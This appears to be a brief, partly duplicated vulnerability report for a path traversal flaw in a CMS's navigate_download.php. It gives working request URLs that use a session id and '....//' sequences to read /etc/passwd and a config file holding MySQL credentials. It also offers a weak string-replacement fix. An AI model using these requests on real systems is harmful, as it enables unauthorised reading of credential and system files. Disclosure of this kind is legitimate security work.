after login ,we can see our sid in cookies
for example my sid is 161099c65675803ecc8de95ae08d3e12
then you can get arbitrary file by
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php you can get some Sensitive information such as mysql user/password
analysis
location:navigate_download.php
and in navigate\lib\core\core.php
we can rewrite bypass this filter.
suggest
you can use replace('../', "hacker") rather than replace('../', "")
exp
after login ,we can see our sid in cookies for example my sid is 161099c65675803ecc8de95ae08d3e12 then you can get arbitrary file by
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php
you can get some Sensitive information such as mysql user/passwordanalysis
location:navigate_download.php and in navigate\lib\core\core.php we can rewrite bypass this filter.
suggest
you can use replace('../', "hacker") rather than replace('../', "")